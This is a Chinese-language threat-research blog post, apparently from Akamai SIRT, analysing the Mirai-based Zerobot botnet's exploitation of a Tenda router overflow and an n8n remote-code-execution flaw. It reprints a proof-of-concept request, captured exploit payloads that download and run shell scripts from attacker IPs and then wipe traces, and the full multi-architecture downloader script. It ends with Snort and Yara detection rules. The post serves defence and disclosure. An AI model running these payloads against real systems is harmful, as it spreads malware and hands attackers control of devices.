Zerobot 恶意软件针对 n8n 自动化平台发起攻击

Feb 27, 2026

寫於

Kyle Lefton 是 Akamai 安全智能响应团队中的安全研究员。Kyle 之前担任过美国国防部的情报分析人员，他在网络防御、威胁研究和反情报工作方面拥有数年的经验。他为参与调查新兴威胁、漏洞研究和威胁组织映射方面的工作而感到自豪。闲暇之余，他喜欢与朋友和家人一起度过欢乐时光，也喜欢玩一玩策略游戏或者去户外徒步旅行。

Akamai 安全情报响应团队 (SIRT) 发现针对腾达 AC1206 路由器和 n8n 自动化平台的命令注入漏洞 CVE-2025-7544 及 CVE-2025-68613 遭到主动利用。
2026 年 1 月，SIRT 团队首次在我们的全球蜜罐网络中发现此类攻击活动。这是自这两个漏洞分别于 2025 年 7 月和 2025 年 12 月首次披露以来，首次报告此类主动利用事件。
为帮助抵御此威胁，我们在本博文中提供了相关的入侵指标 (IoC) 列表。

跳转到 IoC

前言

Akamai SIRT 发现了一起持续活跃且基于 Mirai 的恶意软件攻击活动。该活动被命名为 Zerobot，其目标是近期披露的一系列 CVE，其中包括影响腾达 AC1206 路由器和 n8n 工作流自动化平台的 CVE。该僵尸网络攻击活动最早可以追溯到 2025 年 12 月初。2026 年 1 月中旬，我们的全球蜜罐网络发现了其近期的漏洞利用行为，攻击者正借此传播 Mirai 恶意软件的一个变体。

针对 n8n 漏洞的攻击尤其值得关注：僵尸网络通常会利用物联网 (IoT) 设备（例如，安全摄像头、DVR 和路由器），但 n8n 属于完全不同的类别。

对于僵尸网络来说，虽然这种行为并非前所未见，但此类针对性攻击给企业带来了更大的危险，因为 n8n 漏洞利用可能会让攻击者实现横向移动，从而导致更多关键基础架构面临被入侵的风险。

目标漏洞

SIRT 的观察表明，Zerobot 正在以两个不同的漏洞为目标：CVE-2025-7544 和 CVE-2025-68613。在我们的蜜罐中，捕获到这些漏洞利用尝试的时间戳均晚于相关 CVE 的公开披露时间，这证实了这些漏洞并非零日漏洞。

如今，攻击者伺机利用近期所披露漏洞的行为已变得十分普遍。即使是那些在补丁管理方面做得非常到位的精明企业，在漏洞首次披露后也往往会出现一个容易遭受攻击的窗口期，更何况还有一些企业完全忽视了为这类设备安装补丁。

CVE-2025-7544 详细信息

CVE-2025-7544 披露于 2025 年 7 月中旬，是一个基于堆栈的远程缓冲区溢出漏洞，会影响运行 15.03.06.23 版本的腾达 AC1206 设备中的 /goform/setMacFilterCfg 端点。它被评为“严重”级别漏洞，攻击者可通过 deviceList 参数对其进行利用。在函数 parse_macfilter_rule 中，变量 s（实际为 v3）在未经任何长度检查的情况下被传递给 strcpy 函数，这可能导致基于堆栈的缓冲区 dest（即 s_2）发生溢出。

通过请求相关页面，攻击者甚至可以轻松地远程实施拒绝服务 (DoS) 攻击或远程代码执行 (RCE)。目前已有公开的概念验证 (PoC)，对该漏洞及其利用方式进行了更为详尽的分析（图 1）。

import requests
ip = "192.168.0.1"
url = "http://" + ip + "/goform/setMacFilterCfg"
data = {
    "macFilterType": "white",
    "deviceList": "a" * 1000 + "\r" + "b" * 1000
}
response = requests.get(url, params=data)
print(response.text)

图 1：CVE-2025-7544 概念验证利用

CVE-2025-68613 详细信息

CVE-2025-68613 披露于 2025 年 12 月中旬，是一个影响 n8n 工作流自动化平台中工作流表达式评估系统的 RCE 漏洞（受影响版本涵盖 0.211.0 到 1.20.4，以及 1.21.1 和 1.22.0），它被评为“严重”级别漏洞。

在 n8n 中，系统允许用户在工作流中编写表达式以动态处理数据。但在对这些表达式进行评估时未使用适当的沙盒处理机制，这使得攻击者能够突破预设的执行上下文，从而能够在服务器上运行任意代码。通过在底层系统上运行这些表达式，攻击者还可以对服务器上的文件进行读写、窃取 API 密钥等环境变量，并实现持久化驻留。

该漏洞很容易被利用，攻击者只需要使用不具有管理权限的用户登录，即可访问 n8n 有权访问的所有数据。许多企业将 n8n 用于各种用途，例如将数据库与云服务集成、实现数据处理自动化、管理敏感数据以及连接各种平台和内部系统。针对此漏洞，目前也已发布公开的概念验证利用。

对腾达路由器和 n8n 的主动利用

从 2026 年 1 月中旬开始，Akamai SIRT 在我们的全球蜜罐网络中发现了 Zerobot 对 CVE-2025-7544 的主动利用尝试。正如您在图 2 中所看到的，此利用尝试通过在 deviceList 参数中使用 500 个“A”字符来触发缓冲区溢出，从而使其能够执行任意代码。随后，该漏洞利用会从位于美国的 IP 地址 144.172.100.228 下载并执行名为 tol.sh 的恶意 shell 脚本。

/goform/setMacFilterCfg

macFilterType=black&deviceList=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAcd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod 777 /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/tol.sh; curl -O http://144.172.100[.]228/tol.sh; chmod 777 tol.sh; sh tol.sh; tftp 140.233.190.96 -c get tol.sh; chmod 777 tol.sh; sh tol.sh; tftp -r 3.sh -g 140.233.190.96; chmod 777 3.sh; sh 3.sh; ftpget -v -u anonymous -p anonymous -P 21 140.233.190.96 2.sh 2.sh; sh 2.sh; rm -rf tol.sh tol.sh 3.sh 2.sh; rm -rf *; history -c

图 2：CVE-2025-7544 主动利用尝试的示例

SIRT 还观察到 Zerobot 试图利用近期的 n8n 漏洞之一：CVE-2025-68613（图 3）。其执行过程与其他利用尝试大致相同，都会下载并执行 tol.sh shell 脚本，以获取并加载 zerobotv9 的主要 Mirai 恶意软件攻击负载。

/rest/workflow/run

{"workflowData":{"nodes":[{"parameters":{"command":"cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod 777 /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/tol.sh; curl -O http://144.172.100[.]228/tol.sh; chmod 777 tol.sh; sh tol.sh; tftp 140.233.190.96 -c get tol.sh; chmod 777 tol.sh; sh tol.sh; tftp -r 3.sh -g 140.233.190.96; chmod 777 3.sh; sh 3.sh; ftpget -v -u anonymous -p anonymous -P 21 140.233.190.96 2.sh 2.sh; sh 2.sh; rm -rf tol.sh tol.sh 3.sh 2.sh; rm -rf *; history -c"},"name":"Exec","type":"n8n-nodes-base.executeCommand","typeVersion":1,"position":[100,100]}],"connections":{}}}

图 3：CVE-2025-68613 主动利用尝试的示例

尽管基于 Mirai 的僵尸网络将 n8n 作为攻击目标并非前所未闻，但这与其通常利用物联网设备的典型做法大相径庭。僵尸网络有可能获取企业关键基础架构的访问权限、实现持久化驻留，甚至可能进行横向移动，这无疑令人担忧。

Zerobot 僵尸网络

图 4 中的 shell 脚本会获取并执行基于 Mirai 的主要恶意软件攻击负载 zerobotv9，该攻击负载支持各种不同的架构，这也是 Mirai 下载器的一个常见特征。经 UPX 封装的攻击负载包含各种加密字符串和参数，其中包括一个硬编码的命令和控制域 0bot.qzz[.]io，以及常见的 Mirai 恶意软件控制台执行字符串（在本例中为“bruh why again”）。

Zerobot 这一代号最早可以追溯到 Fortinet 于 2022 年发布的一篇文章，但目前尚不清楚涉事的攻击者是否与此相关。其命名法表明，这是 Zerobot 恶意软件的第九个迭代版本，但其余八个版本的下落仍有待查明。

除了 2022 年最初的发现之外，我们确实找到了可追溯至 2025 年 8 月、名为 zerobotv2 的公开恶意软件样本，但这些样本似乎只是常用的 LZRD Mirai 恶意软件变体。

#!/bin/bash

ulimit -n 1024
cp /bin/busybox /tmp/
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.x86; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.x86; chmod +x *; ./zerobotv9.x86 zerobotv9.x86; rm -rf zerobotv9.x86
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.mips; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.mips; chmod +x *; ./zerobotv9.mips zerobotv9.mips; rm -rf zerobotv9.mips
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arc; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arc; chmod +x *; ./zerobotv9.arc zerobotv9.arc; rm -rf zerobotv9.arc
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.i686; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.i686; chmod +x *; ./zerobotv9.i686 zerobotv9.i686; rm -rf zerobotv9.i686
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.x86_64; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.x86_64; chmod +x *; ./zerobotv9.x86_64 zerobotv9.x86_64; rm -rf zerobotv9.x86_64
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.mpsl; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.mpsl; chmod +x *; ./zerobotv9.mpsl zerobotv9.mpsl; rm -rf zerobotv9.mpsl
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arm; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arm; chmod +x *; ./zerobotv9.arm zerobotv9.arm; rm -rf zerobotv9.arm
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arm5; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arm5; chmod +x *; ./zerobotv9.arm5 zerobotv9.arm5; rm -rf zerobotv9.arm5
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arm6; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arm6; chmod +x *; ./zerobotv9.arm6 zerobotv9.arm6; rm -rf zerobotv9.arm6
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arm7; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arm7; chmod +x *; ./zerobotv9.arm7 zerobotv9.arm7; rm -rf zerobotv9.arm7
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.ppc; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.ppc; chmod +x *; ./zerobotv9.ppc zerobotv9.ppc; rm -rf zerobotv9.ppc
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.spc; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.spc; chmod +x *; ./zerobotv9.spc zerobotv9.spc; rm -rf zerobotv9.spc
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.m68k; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.m68k; chmod +x *; ./zerobotv9.m68k zerobotv9.m68k; rm -rf zerobotv9.m68k
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.sh4; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.sh4; chmod +x *; ./zerobotv9.sh4 zerobotv9.sh4; rm -rf zerobotv9.sh4

图 4：tol.sh 的内容

在最初的 2022 版 Zerobot 恶意软件与较新的 Zerobotv9 样本之间，存在着诸多差异。最显著的区别在于，原始版本的文件要大得多并使用 Go 语言编写，而 Zerobotv9 的体积较小并且未使用 Go 语言编写。

但是，我们确实发现了一些来自原始下载器 IP 地址、时间可追溯至 2022 年 10 月且被标记为 Zerobot 的样本，这些样本未使用 Go 语言编写。无论是 2022 年 10 月的变体，还是 Zerobotv9，二者都使用了与原始 Mirai 恶意软件相同的 XOR 密钥，即 0XDEADBEEF 或 0x22。

这个新版本还增加了旧版本缺少的各种攻击功能，例如 TCPXmas、Mixamp、SSH 和名为 Discord 的攻击方法。硬编码的用户代理如图 5 所示。

Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/4.0; GTB7.4; Info Path.3; SV1; .NET CLR 3.4.53360; WOW64; en-US)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; FDM; MSIECrawler; Media Center PC 5.0)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 4.4.58799; WOW64; en-US)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts)
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 Firefox/21.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:24.0) Gecko/20100101 Firefox/24.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94

图 5：来自已解密的 Zerobotv9 恶意软件的硬编码用户代理

其他漏洞利用

尽管本博文重点介绍了对腾达设备和 n8n 平台的主动利用，但 SIRT 也观察到 Zerobot 针对其他几个漏洞发起了攻击，其中包括 CVE-2017-9841（图 6）、CVE-2021-3129（图 7）和 CVE-2022-22947（图 8）等。

这些利用尝试与我们重点介绍的漏洞利用尝试略有不同，因为它们使用 netcat 和 socat 来打开原始 TCP 连接并将数据从套接字读取到 stdout，紧接着通过命令执行脚本，以加载 Mirai 恶意软件的主要攻击负载。

攻击者也针对 n8n 和腾达漏洞使用了该方法，并且准备了多种备用方案，例如 Perl 套接字、Bash TCP 重定向、PHP 套接字以及 Python 套接字。2025 年 12 月初，攻击者最先采用的是这种手法，随后于 2026 年 1 月转为使用 curl 和 wget 等工具。

结论

尽管执法部门近期采取了一些备受瞩目的打击行动，但遗憾的是，Mirai 的蔓延势头仍在继续，因为构建一个基于 Mirai 的僵尸网络的门槛已经变得相当低。在轻松牟利的诱惑下，或者纯粹为了寻求刺激，相对缺乏经验的攻击者只需要对旧的 Mirai 代码稍加修改就能进行重复使用，甚至可以借助 AI 工具实现迭代。

对零日漏洞的研究和开发也并非必不可少，因为针对近期披露的 CVE 或某些企业疏于升级的老旧硬件发起攻击，往往就能取得显著的效果。这或许不会演变成像 Aisuru 那样臭名昭著的大规模僵尸网络，但仍能为运营者带来一定的利润，并使他们更容易避开安全检测机制。

漏洞披露利大于弊

正如我们先前所报告的，CVE 计划有时会成为一把双刃剑，它会公开攻击者原本未发现的那些漏洞。尽管我们认为该披露机制对整个行业而言仍然利大于弊，但必须引起重视的是，攻击者通常也在密切监控这些漏洞披露信息，企图在各企业完成有效修复之前抢占漏洞利用的窗口期。

Zerobot 所利用的腾达和 n8n 漏洞都有了公开的概念验证漏洞利用，这会显著降低主动利用的实施难度并加快其传播速度。鉴于企业有时会将 n8n 用在更关键的工作流中，我们强烈建议任何可能受影响的企业都尽快保护并修补其系统，以防范此类或其他恶意活动。

关注新动态

Akamai SIRT 将继续监控此类威胁，并随时为我们的客户和整个安全社区报告相关情况。如需第一时间了解 SIRT 以及 Akamai 安全情报组发布的其他重要信息，请查看我们的研究首页并关注我们的社交媒体频道。

IOC

为了帮助企业有效防御威胁，我们提供了相关的入侵指标 (IoC) 列表以及 Snort 和 Yara 规则。

针对恶意 IP 的 Snort 规则

alert ip any any -> [140.233.190.96, 144.172.100.228, 172.86.123.179, 216.126.227.101, 103.59.160.237] any (
    msg:"Possible Botnet Infrastructure Activity - Suspicious IP"; 
    sid:2000003; 
    rev:1; 
    threshold:type limit, track by_src, count 1, seconds 600; 
    classtype:trojan-activity; 
    metadata:service http, malware;
)

针对 C2 域解析检测的 Snort 规则

alert http any any -> [0bot.qzz.io, andro.notemacro.com, pivot.notemacro.com] any (
    msg:"Possible Botnet C2 or Malware Distribution - Suspicious Domain"; 
    sid:2000002; rev:1; 
    classtype:trojan-activity; 
    metadata:service http, malware;
)

针对恶意软件样本的 Yara 规则

rule Mirai_Malware_IOCs_1
{
    meta:
        description = "Detects files containing IOCs associated with potential Mirai malware"
        author = "Akamai SIRT"
        date = "2026-01-29"
        source = "Akamai SIRT"
        malware_family = "Mirai"
        version = "1.0"

    strings:
        $bruh = "bruh why again"
        $url1 = "mamakmukekkontol"
        $url2 = "inihiddenngentod"

        $ip1 = "140.233.190.96"
        $ip2 = "144.172.100.228"
        $ip3 = "172.86.123.179"
        $ip4 = "216.126.227.101"
        $ip5 = "103.59.160.237"

        $domain1 = "0bot.qzz.io"
        $domain2 = "andro.notemacro.com"
        $domain3 = “pivot.notemacro.com”

        $hash1 = "c8e8b627398ece071a3a148d6f38e46763dc534f9bfd967ebc8ac3479540111f"
        $hash2 = "360467c3b733513c922b90d0e222067509df6481636926fa1786d0273169f4da"
        $hash3 = "cc1efbca0da739b7784d833e56a22063ec4719cd095b16e3e10f77efd4277e24"
        $hash4 = "045a1e42cb64e4aa91601f65a80ec5bd040ea4024c6d3b051cb1a6aa15d03b57"
        $hash5 = "d024039824db6fe535ddd51bc81099c946871e4e280c48ed6e90dada79ccfcc7"
        $hash6 = "deb70af83a9b3bb8f9424b709c3f6342d0c63aa10e7f8df43dd7a457bda8f060"
        $hash7 = "6e4e797262c80b9117aded5d25ff2752cd83abe631096b66e120cc3599a82e4e"
        $hash8 = "2fdb2a092f71e4eba2a114364dc8044a7aa7f78b32658735c5375bf1e4e8ece3"
        $hash9 = "263a363e2483bf9fd9f915527f5b5255daa42bbfa1e606403169575d6555a58c"
        $hash10 = "d7112dd3220ccb0b3e757b006acf9b92af466a285bbb0674258bcc9ad463f616"

    condition:
        (
            $url1 or
            $url2 or
            $ip1 or
            $ip2 or
            $ip3 or
            $ip4 or
            $ip5 or
            $domain1 or
            $domain2 or
            $domain3 or
            $hash1 or
            $hash2 or
            $hash3 or
            $hash4 or
            $hash5 or
            $hash6 or
            $hash7 or
            $hash8 or
            $hash9 or
            $hash10
        )
}